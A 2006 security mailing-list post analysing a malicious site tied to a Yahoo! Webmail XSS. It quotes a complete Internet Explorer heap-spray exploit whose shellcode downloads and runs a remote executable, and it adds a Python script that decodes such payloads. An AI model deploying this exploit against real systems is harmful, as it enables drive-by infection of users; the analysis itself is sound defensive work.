Dailydave mailing list archives

RE: [Argeniss] Alert - Yahoo! Webmail XSS


From: "C programming List" <cprog.list () gmail com>
Date: Tue, 18 Apr 2006 17:54:23 -0400

The top page a level above that is quite interesting too.  Although I'd only
recommend browsing it with wget and notepad, to be on the safe side.  Should
someone perhaps notify all those banks mentioned?  (Then again, telling them
"Watch out for suspicious CC transactions from eastern European nations"
probably isn't telling them anything they don't already know....)


   cheers,
     DaveK

Looking at the front page in my regular browsers (firefox, galeon,
konqueror), all 3 die; apparently, from what I see, the browser
makes repetitive calls to mmap2:
mmap2(NULL, 524288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
-1, 0) = 0x8af82000

I don't know what he wants, but apparently it is just to map as much
memory as possible. Does anyone know what script he uses to generate
this?
There is also http://www.w00tynetwork.com/news.htm which has what I
believe is an IE explorer exploit, maybe another browser, but Windows
oriented.

<head>
<meta http-equiv="refresh" content="2;url=news.htm">
</head>
<input type="checkbox" id="javascript">
<SCRIPT language="javascript">

shellcode = unescape(
    "%uCCE9%u0000%u5F00%u56E8%u0000%u8900%u50C3%u8E68%u0E4E%uE8EC" +
    "%u0060%u0000%uC931%uB966%u6E6F%u6851%u7275%u6D6C%uFF54%u50D0" +
    "%u3668%u2F1A%uE870%u0046%u0000%uC931%u5151%u378D%u8D56%u0877" +
    "%u5156%uD0FF%u6853%uFE98%u0E8A%u2DE8%u0000%u5100%uFF57%u31D0" +
    "%u49C9%u9090%u6853%uD87E%u73E2%u19E8%u0000%uFF00%u55D0%u6456" +
    "%u30A1%u0000%u8B00%u0C40%u708B%uAD1C%u688B%u8908%u5EE8%uC35D" +
    "%u5553%u5756%u6C8B%u1824%u458B%u8B3C%u0554%u0178%u8BEA%u184A" +
    "%u5A8B%u0120%uE3EB%u4935%u348B%u018B%u31EE%uFCFF%uC031%u38AC" +
    "%u74E0%uC107%u0DCF%uC701%uF2EB%u7C3B%u1424%uE175%u5A8B%u0124" +
    "%u66EB%u0C8B%u8B4B%u1C5A%uEB01%u048B%u018B%uE9E8%u0002%u0000" +
    "%uC031%uEA89%u5E5F%u5B5D%uE8C3%uFF2F%uFFFF%u6F61%u2E6C%u7865" +
    
"%u0065%u7468%u7074%u2F3A%u772F%u7777%u772E%u3030%u7974%u656E%u7774%u726F%u2E6B%u6F63%u2F6D%u6962%u616E%u7972%u2E32%u7865%u0065%u0000");

bigblock = unescape("%u9090%u9090");
slackspace = 20 + shellcode.length

while (bigblock.length < slackspace)
    bigblock += bigblock;

fillblock = bigblock.substring(0, slackspace);

block = bigblock.substring(0, bigblock.length-slackspace);

while(block.length + slackspace < 0x40000)
    block = block + block + fillblock;

memory = new Array();

for ( i = 0; i < 2020; i++ )
    memory[i] = block + shellcode;

var r = document.getElementById('javascript').createTextRange();

</script>

This shellcode downloads and execs this binary:
http://www.w00tynetwork.com/binary2.exe. Does anyone know what the binary
does?
I've tried to get the file that the XSS is going to download, but the
address never replies:
http://211.22.14.50/.yahoomail/x.htm
A whois on the address gives a company named Ceraco International Co., Ltd.,
which I guess is a drone..
Does anyone have any more on this web?
-daniel
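The way Daniel read the download URL out of the spray page is to decode the %u-escaped string the same way the browser lays it out in memory. The script below is an added example, not from the post or the page it discusses: it pulls each unescape() call out of a page, decodes it into the little-endian bytes the heap spray produces, measures the %u9090 NOP sled and lists the printable strings (such as the download URL) without executing anything. SAMPLE_JS is a constructed stand-in with a placeholder URL, not the shellcode from the post.

```python
import re
from typing import Dict, List

# Constructed sample (not the page's shellcode): a short NOP sled and a payload
# whose tail spells out a placeholder download URL, as a heap-spray page embeds it.
SAMPLE_JS = (
    'sled = unescape("%u9090%u9090%u9090%u9090");\n'
    'payload = unescape("%uCCE9%u0000" + "%u7468%u7074%u2F3A%u652F%u6178%u706D%u656C"\n'
    '    + "%u692E%u766E%u6C61%u6469%u782F%u652E%u6578%u0000");\n'
)

UNESCAPE_CALL = re.compile(r'unescape\(\s*((?:"[^"]*"\s*\+?\s*)+)\)')

def js_unescape_to_bytes(s: str) -> bytes:
    """Decode a JavaScript unescape() literal into the bytes the resulting string
    occupies in memory: every %uXXXX, %XX or plain character becomes one 16-bit
    code unit stored little-endian, which is how the spray lands on the heap."""
    out = bytearray()
    i = 0
    while i < len(s):
        if s.startswith('%u', i) and re.fullmatch(r'[0-9a-fA-F]{4}', s[i + 2:i + 6]):
            unit, i = int(s[i + 2:i + 6], 16), i + 6
        elif s[i] == '%' and re.fullmatch(r'[0-9a-fA-F]{2}', s[i + 1:i + 3]):
            unit, i = int(s[i + 1:i + 3], 16), i + 3
        else:
            unit, i = ord(s[i]), i + 1
        out += unit.to_bytes(2, 'little')
    return bytes(out)

def longest_nop_run(data: bytes) -> int:
    """Length of the longest run of 0x90 bytes (the %u9090 sled)."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == 0x90 else 0
        best = max(best, cur)
    return best

def printable_strings(data: bytes, min_len: int = 6) -> List[str]:
    """ASCII strings embedded in the decoded payload, e.g. the URL it fetches."""
    return [m.decode('ascii') for m in re.findall(rb'[\x20-\x7e]{%d,}' % min_len, data)]

def triage(js: str) -> List[Dict]:
    """Decode each unescape() call in a page and summarise it without running it."""
    report = []
    for m in UNESCAPE_CALL.finditer(js):
        data = js_unescape_to_bytes(''.join(re.findall(r'"([^"]*)"', m.group(1))))
        report.append({'bytes': len(data), 'nop_run': longest_nop_run(data),
                       'strings': printable_strings(data)})
    return report
```

Running triage(SAMPLE_JS) reports an 8-byte all-NOP block for the sled and a 34-byte payload whose only printable string is the placeholder URL; the same pass over the page's script would surface the binary2.exe URL Daniel quotes.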
